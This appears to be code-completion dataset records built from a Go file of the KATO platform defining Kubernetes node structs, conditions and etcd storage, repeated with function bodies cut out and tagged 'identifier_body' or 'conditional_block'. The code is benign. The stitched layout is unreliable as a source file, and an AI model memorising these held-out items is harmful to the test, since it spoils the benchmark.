"github.com/sirupsen/logrus"
v1 "k8s.io/api/core/v1"
)
//LabelOS - node label about os
var LabelOS = "beta.kubernetes.io/os"
var LabelGPU = "beta.kato.com/gpushare"
//APIHostNode
type APIHostNode struct {
ID string `json:"uuid" validate:"uuid"`
HostName string `json:"host_name" validate:"host_name"`
InternalIP string `json:"internal_ip" validate:"internal_ip|ip"`
ExternalIP string `json:"external_ip" validate:"external_ip|ip"`
RootPass string `json:"root_pass,omitempty"`
Privatekey string `json:"private_key,omitempty"`
Role HostRule `json:"role" validate:"role|required"`
PodCIDR string `json:"podCIDR"`
AutoInstall bool `json:"auto_install"`
Labels map[string]string `json:"labels"`
}
//Clone
func (a APIHostNode) Clone() *HostNode {
hn := &HostNode{
ID: a.ID,
HostName: a.HostName,
InternalIP: a.InternalIP,
ExternalIP: a.ExternalIP,
RootPass: a.RootPass,
KeyPath: a.Privatekey,
Role: a.Role,
Labels: map[string]string{"kato_node_hostname": a.HostName},
CustomLabels: map[string]string{},
NodeStatus: NodeStatus{Status: "not_installed", Conditions: make([]NodeCondition, 0)},
Status: "not_installed",
PodCIDR: a.PodCIDR,
//node default unscheduler
Unschedulable: true,
}
return hn
}
//HostNode - kato node entity
type HostNode struct {
ID string `json:"uuid"`
HostName string `json:"host_name"`
CreateTime time.Time `json:"create_time"`
InternalIP string `json:"internal_ip"`
ExternalIP string `json:"external_ip"`
RootPass string `json:"root_pass,omitempty"`
KeyPath string `json:"key_path,omitempty"` //Management node key file path
AvailableMemory int64 `json:"available_memory"`
AvailableCPU int64 `json:"available_cpu"`
Mode string `json:"mode"`
Role HostRule `json:"role"` //compute, manage, storage, gateway
Status string `json:"status"`
Labels map[string]string `json:"labels"` // system labels
CustomLabels map[string]string `json:"custom_labels"` // custom labels
Unschedulable bool `json:"unschedulable"` // Settings
PodCIDR string `json:"podCIDR"`
NodeStatus NodeStatus `json:"node_status"`
}
//Resource
type Resource struct {
CPU int `json:"cpu"`
MemR int `json:"mem"`
}
// NodePodResource -
type NodePodResource struct {
AllocatedResources `json:"allocatedresources"`
Resource `json:"allocatable"`
}
// AllocatedResources -
type AllocatedResources struct {
CPURequests int64
CPULimits int64
MemoryRequests int64
MemoryLimits int64
MemoryRequestsR string
MemoryLimitsR string
CPURequestsR string
CPULimitsR string
}
//NodeStatus
type NodeStatus struct {
//worker maintenance
Version string `json:"version"`
//worker maintenance example: unscheduler, offline
//Initiate a recommendation operation to the master based on the node state
AdviceAction []string `json:"advice_actions"`
//worker maintenance
Status string `json:"status"` //installed running offline unknown
//master maintenance
CurrentScheduleStatus bool `json:"current_scheduler"`
//master maintenance
NodeHealth bool `json:"node_health"`
//worker maintenance
NodeUpdateTime time.Time `json:"node_update_time"`
//master maintenance
KubeUpdateTime time.Time `json:"kube_update_time"`
//worker maintenance node progress down time
LastDownTime time.Time `json:"down_time"`
//worker and master maintenance
Conditions []NodeCondition `json:"conditions,omitempty"`
//master maintenance
KubeNode *v1.Node
//worker and master maintenance
NodeInfo NodeSystemInfo `json:"nodeInfo,omitempty" protobuf:"bytes,7,opt,name=nodeInfo"`
}
//UpdateK8sNodeStatus update kato node status by k8s node
func (n *HostNode) UpdateK8sNodeStatus(k8sNode v1.Node) {
status := k8sNode.Status
n.UpdataK8sCondition(status.Conditions)
n.NodeStatus.NodeInfo = NodeSystemInfo{
MachineID: status.NodeInfo.MachineID,
SystemUUID: status.NodeInfo.SystemUUID,
BootID: status.NodeInfo.BootID,
KernelVersion: status.NodeInfo.KernelVersion,
OSImage: status.NodeInfo.OSImage,
OperatingSystem: status.NodeInfo.OperatingSystem,
ContainerRuntimeVersion: status.NodeInfo.ContainerRuntimeVersion,
Architecture: status.NodeInfo.Architecture,
}
}
// MergeLabels merges custom lables into labels.
func (n *HostNode) MergeLabels() map[string]string {
// TODO: Parallel
labels := make(map[string]string, len(n.Labels)+len(n.CustomLabels))
// copy labels
for k, v := range n.Labels {
labels[k] = v
}
for k, v := range n.CustomLabels {
if _, ok := n.Labels[k]; !ok {
labels[k] = v
}
}
return labels
}
// NodeSystemInfo is a set of ids/uuids to uniquely identify the node.
type NodeSystemInfo struct {
// MachineID reported by the node. For unique machine identification
// in the cluster this field is preferred. Learn more from man(5)
// machine-id: http://man7.org/linux/man-pages/man5/machine-id.5.html
MachineID string `json:"machineID"`
// SystemUUID reported by the node. For unique machine identification
// MachineID is preferred. This field is specific to Red Hat hosts
// https://access.redhat.com/documentation/en-US/Red_Hat_Subscription_Management/1/html/RHSM/getting-system-uuid.html
SystemUUID string `json:"systemUUID"`
// Boot ID reported by the node.
BootID string `json:"bootID" protobuf:"bytes,3,opt,name=bootID"`
// Kernel Version reported by the node from 'uname -r' (e.g. 3.16.0-0.bpo.4-amd64).
KernelVersion string `json:"kernelVersion" `
// OS Image reported by the node from /etc/os-release (e.g. Debian GNU/Linux 7 (wheezy)).
OSImage string `json:"osImage"`
// ContainerRuntime Version reported by the node through runtime remote API (e.g. docker://1.5.0).
ContainerRuntimeVersion string `json:"containerRuntimeVersion"`
// The Operating System reported by the node
OperatingSystem string `json:"operatingSystem"`
// The Architecture reported by the node
Architecture string `json:"architecture"`
MemorySize uint64 `json:"memorySize"`
NumCPU int64 `json:"cpu_num"`
}
const (
//Running node running status
Running = "running"
//Offline node offline status
Offline = "offline"
//Unknown node unknown status
Unknown = "unknown"
//Error node error status
Error = "error"
//Init node init status
Init = "init"
//InstallSuccess node install success status
InstallSuccess = "install_success"
//InstallFailed node install failure status
InstallFailed = "install_failed"
//Installing node installing status
Installing = "installing"
//NotInstalled node not install status
NotInstalled = "not_installed"
)
//Decode - decode node info
func (n *HostNode) Decode(data []byte) error {
if err := ffjson.Unmarshal(data, n); err != nil {
logrus.Error("decode node info error:", err.Error())
return err
}
return nil
}
//NodeList
type NodeList []*HostNode
func (list NodeList) Len() int {
return len(list)
}
func (list NodeList) Less(i, j int) bool {
return list[i].InternalIP < list[j].InternalIP
}
func (list NodeList) Swap(i, j int) {
var temp = list[i]
list[i] = list[j]
list[j] = temp
}
//GetNodeFromKV - parse node information from etcd
func GetNodeFromKV(kv *mvccpb.KeyValue) *HostNode {
var node HostNode
if err := ffjson.Unmarshal(kv.Value, &node); err != nil {
logrus.Error("parse node info error:", err.Error())
return nil
}
return &node
}
//UpdataK8sCondition - update the status of the k8s node to the kato node
func (n *HostNode) UpdataK8sCondition(conditions []v1.NodeCondition) {
for _, con := range conditions {
var rbcon NodeCondition
if NodeConditionType(con.Type) == "Ready" {
rbcon = NodeCondition{
Type: KubeNodeReady,
Status: ConditionStatus(con.Status),
LastHeartbeatTime: con.LastHeartbeatTime.Time,
LastTransitionTime: con.LastTransitionTime.Time,
Reason: con.Reason,
Message: con.Message,
}
} else {
if con.Status != v1.ConditionFalse {
rbcon = NodeCondition{
Type: KubeNodeReady,
Status: ConditionFalse,
LastHeartbeatTime: con.LastHeartbeatTime.Time,
LastTransitionTime: con.LastTransitionTime.Time,
Reason: con.Reason,
Message: con.Message,
}
}
}
n.UpdataCondition(rbcon)
}
}
//DeleteCondition
func (n *HostNode) DeleteCondition(types ...NodeConditionType) {
for _, t := range types {
for i, c := range n.NodeStatus.Conditions {
if c.Type.Compare(t) {
n.NodeStatus.Conditions = append(n.NodeStatus.Conditions[:i], n.NodeStatus.Conditions[i+1:]...)
break
}
}
}
}
// UpdateReadyStatus
func (n *HostNode) UpdateReadyStatus() {
var status = ConditionTrue
var Reason, Message string
for _, con := range n.NodeStatus.Conditions {
if con.Status != ConditionTrue && con.Type != "" && con.Type != NodeReady {
logrus.Debugf("because %s id false, will set node %s(%s) health is false", con.Type, n.ID, n.InternalIP)
status = ConditionFalse
Reason = con.Reason
Message = con.Message
break
}
}
n.GetAndUpdateCondition(NodeReady, status, Reason, Message)
}
//GetCondition
func (n *HostNode) GetCondition(ctype NodeConditionType) *NodeCondition {
for _, con := range n.NodeStatus.Conditions {
if con.Type.Compare(ctype) {
return &con
}
}
return nil
}
// GetAndUpdateCondition get old condition and update it, if old condition is nil and then create it
func (n *HostNode) GetAndUpdateCondition(condType NodeConditionType, status ConditionStatus, reason, message string) {
oldCond := n.GetCondition(condType)
now := time.Now()
var lastTransitionTime time.Time
if oldCond == nil {
lastTransitionTime = now
} else {
if oldCond.Status != status {
lastTransitionTime = now
} else {
lastTransitionTime = oldCond.LastTransitionTime
}
}
cond := NodeCondition{
Type: condType,
Status: status,
LastHeartbeatTime: now,
LastTransitionTime: lastTransitionTime,
Reason: reason,
Message: message,
}
n.UpdataCondition(cond)
}
//UpdataCondition
func (n *HostNode) UpdataCondition(conditions ...NodeCondition) {
for _, newcon := range conditions {
if newcon.Type == "" {
continue
}
var update bool
if n.NodeStatus.Conditions != nil {
for i, con := range n.NodeStatus.Conditions {
if con.Type.Compare(newcon.Type) {
n.NodeStatus.Conditions[i] = newcon
update = true
break
}
}
}
if !update {
n.NodeStatus.Conditions = append(n.NodeStatus.Conditions, newcon)
}
}
}
//HostRule
type HostRule []string
//SupportNodeRule
var SupportNodeRule = []string{ComputeNode, ManageNode, StorageNode, GatewayNode}
//ComputeNode
var ComputeNode = "compute"
//ManageNode
var ManageNode = "manage"
//StorageNode
var StorageNode = "storage"
//GatewayNode
var GatewayNode = "gateway"
//HasRule
func (h HostRule) HasRule(rule string) bool {
for _, v := range h {
if v == rule {
return true
}
}
return false
}
func (h HostRule) String() string {
return strings.Join(h, ",")
}
//Add role
func (h *HostRule) Add(role ...string) {
for _, r := range role {
if !util.StringArrayContains(*h, r) {
*h = append(*h, r)
}
}
}
//Validation - host rule validation
func (h HostRule) Validation() error |
//NodeConditionType
type NodeConditionType string
// These are valid conditions of node.
const (
// NodeReady means this node is working
NodeReady NodeConditionType = "Ready"
KubeNodeReady NodeConditionType = "KubeNodeReady"
NodeUp NodeConditionType = "NodeUp"
// InstallNotReady means the installation task was not completed in this node.
InstallNotReady NodeConditionType = "InstallNotReady"
OutOfDisk NodeConditionType = "OutOfDisk"
MemoryPressure NodeConditionType = "MemoryPressure"
DiskPressure NodeConditionType = "DiskPressure"
PIDPressure NodeConditionType = "PIDPressure"
)
var masterCondition = []NodeConditionType{NodeReady, KubeNodeReady, NodeUp, InstallNotReady, OutOfDisk, MemoryPressure, DiskPressure, PIDPressure}
//IsMasterCondition Whether it is a preset condition of the system
func IsMasterCondition(con NodeConditionType) bool {
for _, c := range masterCondition {
if c.Compare(con) {
return true
}
}
return false
}
//Compare
func (nt NodeConditionType) Compare(ent NodeConditionType) bool {
return string(nt) == string(ent)
}
//ConditionStatus
type ConditionStatus string
// These are valid condition statuses. "ConditionTrue" means a resource is in the condition.
// "ConditionFalse" means a resource is not in the condition. "ConditionUnknown" means kubernetes
// can't decide if a resource is in the condition or not. In the future, we could add other
// intermediate conditions, e.g. ConditionDegraded.
const (
ConditionTrue ConditionStatus = "True"
ConditionFalse ConditionStatus = "False"
ConditionUnknown ConditionStatus = "Unknown"
)
// NodeCondition contains condition information for a node.
type NodeCondition struct {
// Type of node condition.
Type NodeConditionType `json:"type" `
// Status of the condition, one of True, False, Unknown.
Status ConditionStatus `json:"status" `
// Last time we got an update on a given condition.
// +optional
LastHeartbeatTime time.Time `json:"lastHeartbeatTime,omitempty" `
// Last time the condition transit from one status to another.
// +optional
LastTransitionTime time.Time `json:"lastTransitionTime,omitempty" `
// (brief) reason for the condition's last transition.
// +optional
Reason string `json:"reason,omitempty"`
// Human readable message indicating details about last transition.
// +optional
Message string `json:"message,omitempty"`
}
//String
func (n *HostNode) String() string {
res, _ := ffjson.Marshal(n)
return string(res)
}
//Update node info
func (n *HostNode) Update() (*client.PutResponse, error) {
savenode := *n
savenode.NodeStatus.KubeNode = nil
return store.DefalutClient.Put(conf.Config.NodePath+"/"+n.ID, savenode.String())
}
//DeleteNode
func (n *HostNode) DeleteNode() (*client.DeleteResponse, error) {
return store.DefalutClient.Delete(conf.Config.NodePath + "/" + n.ID)
}
//DelEndpoints
func (n *HostNode) DelEndpoints() {
keys, err := n.listEndpointKeys()
if err != nil {
logrus.Warningf("error deleting endpoints: %v", err)
return
}
for _, key := range keys {
_, err := store.DefalutClient.Delete(key)
if err != nil {
logrus.Warnf("key: %s; error delete endpoints: %v", key, err)
}
}
}
func (n *HostNode) listEndpointKeys() ([]string, error) {
resp, err := store.DefalutClient.Get(KatoEndpointPrefix, client.WithPrefix())
if err != nil {
return nil, fmt.Errorf("prefix: %s; error list kato endpoint keys by prefix: %v", KatoEndpointPrefix, err)
}
var res []string
for _, kv := range resp.Kvs {
key := string(kv.Key)
if strings.Contains(key, n.InternalIP) {
res = append(res, key)
}
}
return res, nil
}
| {
if len(h) == 0 {
return fmt.Errorf("node rule cannot be enpty")
}
for _, role := range h {
if !util.StringArrayContains(SupportNodeRule, role) {
return fmt.Errorf("node role %s can not be supported", role)
}
}
return nil
} | identifier_body |
node.go | // KATO, Application Management Platform
// Copyright (C) 2021 Gridworkz Co., Ltd.
// Permission is hereby granted, free of charge, to any person obtaining a copy of this
// software and associated documentation files (the "Software"), to deal in the Software
// without restriction, including without limitation the rights to use, copy, modify, merge,
// publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons
// to whom the Software is furnished to do so, subject to the following conditions:
// The above copyright notice and this permission notice shall be included in all copies or
// substantial portions of the Software.
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
// INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
// PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE
// FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
// ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
package client
import (
"fmt"
"strings"
"time"
client "github.com/coreos/etcd/clientv3"
"github.com/coreos/etcd/mvcc/mvccpb"
conf "github.com/gridworkz/kato/cmd/node/option"
"github.com/gridworkz/kato/node/core/store"
"github.com/gridworkz/kato/util"
"github.com/pquerna/ffjson/ffjson"
"github.com/sirupsen/logrus"
v1 "k8s.io/api/core/v1"
)
//LabelOS - node label about os
var LabelOS = "beta.kubernetes.io/os"
var LabelGPU = "beta.kato.com/gpushare"
//APIHostNode
type APIHostNode struct {
ID string `json:"uuid" validate:"uuid"`
HostName string `json:"host_name" validate:"host_name"`
InternalIP string `json:"internal_ip" validate:"internal_ip|ip"`
ExternalIP string `json:"external_ip" validate:"external_ip|ip"`
RootPass string `json:"root_pass,omitempty"`
Privatekey string `json:"private_key,omitempty"`
Role HostRule `json:"role" validate:"role|required"`
PodCIDR string `json:"podCIDR"`
AutoInstall bool `json:"auto_install"`
Labels map[string]string `json:"labels"`
}
//Clone
func (a APIHostNode) Clone() *HostNode {
hn := &HostNode{
ID: a.ID,
HostName: a.HostName,
InternalIP: a.InternalIP,
ExternalIP: a.ExternalIP,
RootPass: a.RootPass,
KeyPath: a.Privatekey,
Role: a.Role,
Labels: map[string]string{"kato_node_hostname": a.HostName},
CustomLabels: map[string]string{},
NodeStatus: NodeStatus{Status: "not_installed", Conditions: make([]NodeCondition, 0)},
Status: "not_installed",
PodCIDR: a.PodCIDR,
//node default unscheduler
Unschedulable: true,
}
return hn
}
//HostNode - kato node entity
type HostNode struct {
ID string `json:"uuid"`
HostName string `json:"host_name"`
CreateTime time.Time `json:"create_time"`
InternalIP string `json:"internal_ip"`
ExternalIP string `json:"external_ip"`
RootPass string `json:"root_pass,omitempty"`
KeyPath string `json:"key_path,omitempty"` //Management node key file path
AvailableMemory int64 `json:"available_memory"`
AvailableCPU int64 `json:"available_cpu"`
Mode string `json:"mode"`
Role HostRule `json:"role"` //compute, manage, storage, gateway
Status string `json:"status"`
Labels map[string]string `json:"labels"` // system labels
CustomLabels map[string]string `json:"custom_labels"` // custom labels
Unschedulable bool `json:"unschedulable"` // Settings
PodCIDR string `json:"podCIDR"`
NodeStatus NodeStatus `json:"node_status"`
}
//Resource
type Resource struct {
CPU int `json:"cpu"`
MemR int `json:"mem"`
}
// NodePodResource -
type NodePodResource struct {
AllocatedResources `json:"allocatedresources"`
Resource `json:"allocatable"`
}
// AllocatedResources -
type AllocatedResources struct {
CPURequests int64
CPULimits int64
MemoryRequests int64
MemoryLimits int64
MemoryRequestsR string
MemoryLimitsR string
CPURequestsR string
CPULimitsR string
}
//NodeStatus
type NodeStatus struct {
//worker maintenance
Version string `json:"version"`
//worker maintenance example: unscheduler, offline
//Initiate a recommendation operation to the master based on the node state
AdviceAction []string `json:"advice_actions"`
//worker maintenance
Status string `json:"status"` //installed running offline unknown
//master maintenance
CurrentScheduleStatus bool `json:"current_scheduler"`
//master maintenance
NodeHealth bool `json:"node_health"`
//worker maintenance
NodeUpdateTime time.Time `json:"node_update_time"`
//master maintenance
KubeUpdateTime time.Time `json:"kube_update_time"`
//worker maintenance node progress down time
LastDownTime time.Time `json:"down_time"`
//worker and master maintenance
Conditions []NodeCondition `json:"conditions,omitempty"`
//master maintenance
KubeNode *v1.Node
//worker and master maintenance
NodeInfo NodeSystemInfo `json:"nodeInfo,omitempty" protobuf:"bytes,7,opt,name=nodeInfo"`
}
//UpdateK8sNodeStatus update kato node status by k8s node
func (n *HostNode) UpdateK8sNodeStatus(k8sNode v1.Node) {
status := k8sNode.Status
n.UpdataK8sCondition(status.Conditions)
n.NodeStatus.NodeInfo = NodeSystemInfo{
MachineID: status.NodeInfo.MachineID,
SystemUUID: status.NodeInfo.SystemUUID,
BootID: status.NodeInfo.BootID,
KernelVersion: status.NodeInfo.KernelVersion,
OSImage: status.NodeInfo.OSImage,
OperatingSystem: status.NodeInfo.OperatingSystem,
ContainerRuntimeVersion: status.NodeInfo.ContainerRuntimeVersion,
Architecture: status.NodeInfo.Architecture,
}
}
// MergeLabels merges custom lables into labels.
func (n *HostNode) MergeLabels() map[string]string {
// TODO: Parallel
labels := make(map[string]string, len(n.Labels)+len(n.CustomLabels))
// copy labels
for k, v := range n.Labels {
labels[k] = v
}
for k, v := range n.CustomLabels {
if _, ok := n.Labels[k]; !ok |
}
return labels
}
// NodeSystemInfo is a set of ids/uuids to uniquely identify the node.
type NodeSystemInfo struct {
// MachineID reported by the node. For unique machine identification
// in the cluster this field is preferred. Learn more from man(5)
// machine-id: http://man7.org/linux/man-pages/man5/machine-id.5.html
MachineID string `json:"machineID"`
// SystemUUID reported by the node. For unique machine identification
// MachineID is preferred. This field is specific to Red Hat hosts
// https://access.redhat.com/documentation/en-US/Red_Hat_Subscription_Management/1/html/RHSM/getting-system-uuid.html
SystemUUID string `json:"systemUUID"`
// Boot ID reported by the node.
BootID string `json:"bootID" protobuf:"bytes,3,opt,name=bootID"`
// Kernel Version reported by the node from 'uname -r' (e.g. 3.16.0-0.bpo.4-amd64).
KernelVersion string `json:"kernelVersion" `
// OS Image reported by the node from /etc/os-release (e.g. Debian GNU/Linux 7 (wheezy)).
OSImage string `json:"osImage"`
// ContainerRuntime Version reported by the node through runtime remote API (e.g. docker://1.5.0).
ContainerRuntimeVersion string `json:"containerRuntimeVersion"`
// The Operating System reported by the node
OperatingSystem string `json:"operatingSystem"`
// The Architecture reported by the node
Architecture string `json:"architecture"`
MemorySize uint64 `json:"memorySize"`
NumCPU int64 `json:"cpu_num"`
}
const (
//Running node running status
Running = "running"
//Offline node offline status
Offline = "offline"
//Unknown node unknown status
Unknown = "unknown"
//Error node error status
Error = "error"
//Init node init status
Init = "init"
//InstallSuccess node install success status
InstallSuccess = "install_success"
//InstallFailed node install failure status
InstallFailed = "install_failed"
//Installing node installing status
Installing = "installing"
//NotInstalled node not install status
NotInstalled = "not_installed"
)
//Decode - decode node info
func (n *HostNode) Decode(data []byte) error {
if err := ffjson.Unmarshal(data, n); err != nil {
logrus.Error("decode node info error:", err.Error())
return err
}
return nil
}
//NodeList
type NodeList []*HostNode
func (list NodeList) Len() int {
return len(list)
}
func (list NodeList) Less(i, j int) bool {
return list[i].InternalIP < list[j].InternalIP
}
func (list NodeList) Swap(i, j int) {
var temp = list[i]
list[i] = list[j]
list[j] = temp
}
//GetNodeFromKV - parse node information from etcd
func GetNodeFromKV(kv *mvccpb.KeyValue) *HostNode {
var node HostNode
if err := ffjson.Unmarshal(kv.Value, &node); err != nil {
logrus.Error("parse node info error:", err.Error())
return nil
}
return &node
}
//UpdataK8sCondition - update the status of the k8s node to the kato node
func (n *HostNode) UpdataK8sCondition(conditions []v1.NodeCondition) {
for _, con := range conditions {
var rbcon NodeCondition
if NodeConditionType(con.Type) == "Ready" {
rbcon = NodeCondition{
Type: KubeNodeReady,
Status: ConditionStatus(con.Status),
LastHeartbeatTime: con.LastHeartbeatTime.Time,
LastTransitionTime: con.LastTransitionTime.Time,
Reason: con.Reason,
Message: con.Message,
}
} else {
if con.Status != v1.ConditionFalse {
rbcon = NodeCondition{
Type: KubeNodeReady,
Status: ConditionFalse,
LastHeartbeatTime: con.LastHeartbeatTime.Time,
LastTransitionTime: con.LastTransitionTime.Time,
Reason: con.Reason,
Message: con.Message,
}
}
}
n.UpdataCondition(rbcon)
}
}
//DeleteCondition
func (n *HostNode) DeleteCondition(types ...NodeConditionType) {
for _, t := range types {
for i, c := range n.NodeStatus.Conditions {
if c.Type.Compare(t) {
n.NodeStatus.Conditions = append(n.NodeStatus.Conditions[:i], n.NodeStatus.Conditions[i+1:]...)
break
}
}
}
}
// UpdateReadyStatus
func (n *HostNode) UpdateReadyStatus() {
var status = ConditionTrue
var Reason, Message string
for _, con := range n.NodeStatus.Conditions {
if con.Status != ConditionTrue && con.Type != "" && con.Type != NodeReady {
logrus.Debugf("because %s id false, will set node %s(%s) health is false", con.Type, n.ID, n.InternalIP)
status = ConditionFalse
Reason = con.Reason
Message = con.Message
break
}
}
n.GetAndUpdateCondition(NodeReady, status, Reason, Message)
}
//GetCondition
func (n *HostNode) GetCondition(ctype NodeConditionType) *NodeCondition {
for _, con := range n.NodeStatus.Conditions {
if con.Type.Compare(ctype) {
return &con
}
}
return nil
}
// GetAndUpdateCondition get old condition and update it, if old condition is nil and then create it
func (n *HostNode) GetAndUpdateCondition(condType NodeConditionType, status ConditionStatus, reason, message string) {
oldCond := n.GetCondition(condType)
now := time.Now()
var lastTransitionTime time.Time
if oldCond == nil {
lastTransitionTime = now
} else {
if oldCond.Status != status {
lastTransitionTime = now
} else {
lastTransitionTime = oldCond.LastTransitionTime
}
}
cond := NodeCondition{
Type: condType,
Status: status,
LastHeartbeatTime: now,
LastTransitionTime: lastTransitionTime,
Reason: reason,
Message: message,
}
n.UpdataCondition(cond)
}
//UpdataCondition
func (n *HostNode) UpdataCondition(conditions ...NodeCondition) {
for _, newcon := range conditions {
if newcon.Type == "" {
continue
}
var update bool
if n.NodeStatus.Conditions != nil {
for i, con := range n.NodeStatus.Conditions {
if con.Type.Compare(newcon.Type) {
n.NodeStatus.Conditions[i] = newcon
update = true
break
}
}
}
if !update {
n.NodeStatus.Conditions = append(n.NodeStatus.Conditions, newcon)
}
}
}
//HostRule
type HostRule []string
//SupportNodeRule
var SupportNodeRule = []string{ComputeNode, ManageNode, StorageNode, GatewayNode}
//ComputeNode
var ComputeNode = "compute"
//ManageNode
var ManageNode = "manage"
//StorageNode
var StorageNode = "storage"
//GatewayNode
var GatewayNode = "gateway"
//HasRule
func (h HostRule) HasRule(rule string) bool {
for _, v := range h {
if v == rule {
return true
}
}
return false
}
func (h HostRule) String() string {
return strings.Join(h, ",")
}
//Add role
func (h *HostRule) Add(role ...string) {
for _, r := range role {
if !util.StringArrayContains(*h, r) {
*h = append(*h, r)
}
}
}
//Validation - host rule validation
func (h HostRule) Validation() error {
if len(h) == 0 {
return fmt.Errorf("node rule cannot be enpty")
}
for _, role := range h {
if !util.StringArrayContains(SupportNodeRule, role) {
return fmt.Errorf("node role %s can not be supported", role)
}
}
return nil
}
//NodeConditionType
type NodeConditionType string
// These are valid conditions of node.
const (
// NodeReady means this node is working
NodeReady NodeConditionType = "Ready"
KubeNodeReady NodeConditionType = "KubeNodeReady"
NodeUp NodeConditionType = "NodeUp"
// InstallNotReady means the installation task was not completed in this node.
InstallNotReady NodeConditionType = "InstallNotReady"
OutOfDisk NodeConditionType = "OutOfDisk"
MemoryPressure NodeConditionType = "MemoryPressure"
DiskPressure NodeConditionType = "DiskPressure"
PIDPressure NodeConditionType = "PIDPressure"
)
var masterCondition = []NodeConditionType{NodeReady, KubeNodeReady, NodeUp, InstallNotReady, OutOfDisk, MemoryPressure, DiskPressure, PIDPressure}
//IsMasterCondition Whether it is a preset condition of the system
func IsMasterCondition(con NodeConditionType) bool {
for _, c := range masterCondition {
if c.Compare(con) {
return true
}
}
return false
}
//Compare
func (nt NodeConditionType) Compare(ent NodeConditionType) bool {
return string(nt) == string(ent)
}
//ConditionStatus
type ConditionStatus string
// These are valid condition statuses. "ConditionTrue" means a resource is in the condition.
// "ConditionFalse" means a resource is not in the condition. "ConditionUnknown" means kubernetes
// can't decide if a resource is in the condition or not. In the future, we could add other
// intermediate conditions, e.g. ConditionDegraded.
const (
ConditionTrue ConditionStatus = "True"
ConditionFalse ConditionStatus = "False"
ConditionUnknown ConditionStatus = "Unknown"
)
// NodeCondition contains condition information for a node.
type NodeCondition struct {
// Type of node condition.
Type NodeConditionType `json:"type" `
// Status of the condition, one of True, False, Unknown.
Status ConditionStatus `json:"status" `
// Last time we got an update on a given condition.
// +optional
LastHeartbeatTime time.Time `json:"lastHeartbeatTime,omitempty" `
// Last time the condition transit from one status to another.
// +optional
LastTransitionTime time.Time `json:"lastTransitionTime,omitempty" `
// (brief) reason for the condition's last transition.
// +optional
Reason string `json:"reason,omitempty"`
// Human readable message indicating details about last transition.
// +optional
Message string `json:"message,omitempty"`
}
//String
func (n *HostNode) String() string {
res, _ := ffjson.Marshal(n)
return string(res)
}
//Update node info
func (n *HostNode) Update() (*client.PutResponse, error) {
savenode := *n
savenode.NodeStatus.KubeNode = nil
return store.DefalutClient.Put(conf.Config.NodePath+"/"+n.ID, savenode.String())
}
//DeleteNode
func (n *HostNode) DeleteNode() (*client.DeleteResponse, error) {
return store.DefalutClient.Delete(conf.Config.NodePath + "/" + n.ID)
}
//DelEndpoints
func (n *HostNode) DelEndpoints() {
keys, err := n.listEndpointKeys()
if err != nil {
logrus.Warningf("error deleting endpoints: %v", err)
return
}
for _, key := range keys {
_, err := store.DefalutClient.Delete(key)
if err != nil {
logrus.Warnf("key: %s; error delete endpoints: %v", key, err)
}
}
}
func (n *HostNode) listEndpointKeys() ([]string, error) {
resp, err := store.DefalutClient.Get(KatoEndpointPrefix, client.WithPrefix())
if err != nil {
return nil, fmt.Errorf("prefix: %s; error list kato endpoint keys by prefix: %v", KatoEndpointPrefix, err)
}
var res []string
for _, kv := range resp.Kvs {
key := string(kv.Key)
if strings.Contains(key, n.InternalIP) {
res = append(res, key)
}
}
return res, nil
}
| {
labels[k] = v
} | conditional_block |
node.go | // KATO, Application Management Platform
// Copyright (C) 2021 Gridworkz Co., Ltd.
// Permission is hereby granted, free of charge, to any person obtaining a copy of this
// software and associated documentation files (the "Software"), to deal in the Software
// without restriction, including without limitation the rights to use, copy, modify, merge,
// publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons
// to whom the Software is furnished to do so, subject to the following conditions:
// The above copyright notice and this permission notice shall be included in all copies or
// substantial portions of the Software.
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
// INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
// PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE
// FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
// ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
package client
import (
"fmt"
"strings"
"time"
client "github.com/coreos/etcd/clientv3"
"github.com/coreos/etcd/mvcc/mvccpb"
conf "github.com/gridworkz/kato/cmd/node/option"
"github.com/gridworkz/kato/node/core/store"
"github.com/gridworkz/kato/util"
"github.com/pquerna/ffjson/ffjson"
"github.com/sirupsen/logrus"
v1 "k8s.io/api/core/v1"
)
//LabelOS - node label about os
var LabelOS = "beta.kubernetes.io/os"
var LabelGPU = "beta.kato.com/gpushare"
//APIHostNode
type APIHostNode struct {
ID string `json:"uuid" validate:"uuid"`
HostName string `json:"host_name" validate:"host_name"`
InternalIP string `json:"internal_ip" validate:"internal_ip|ip"`
ExternalIP string `json:"external_ip" validate:"external_ip|ip"`
RootPass string `json:"root_pass,omitempty"`
Privatekey string `json:"private_key,omitempty"`
Role HostRule `json:"role" validate:"role|required"`
PodCIDR string `json:"podCIDR"`
AutoInstall bool `json:"auto_install"`
Labels map[string]string `json:"labels"`
}
//Clone
func (a APIHostNode) Clone() *HostNode {
hn := &HostNode{
ID: a.ID,
HostName: a.HostName,
InternalIP: a.InternalIP,
ExternalIP: a.ExternalIP,
RootPass: a.RootPass,
KeyPath: a.Privatekey,
Role: a.Role,
Labels: map[string]string{"kato_node_hostname": a.HostName},
CustomLabels: map[string]string{},
NodeStatus: NodeStatus{Status: "not_installed", Conditions: make([]NodeCondition, 0)},
Status: "not_installed",
PodCIDR: a.PodCIDR,
//node default unscheduler
Unschedulable: true,
}
return hn
}
//HostNode - kato node entity
type HostNode struct {
ID string `json:"uuid"`
HostName string `json:"host_name"`
CreateTime time.Time `json:"create_time"`
InternalIP string `json:"internal_ip"`
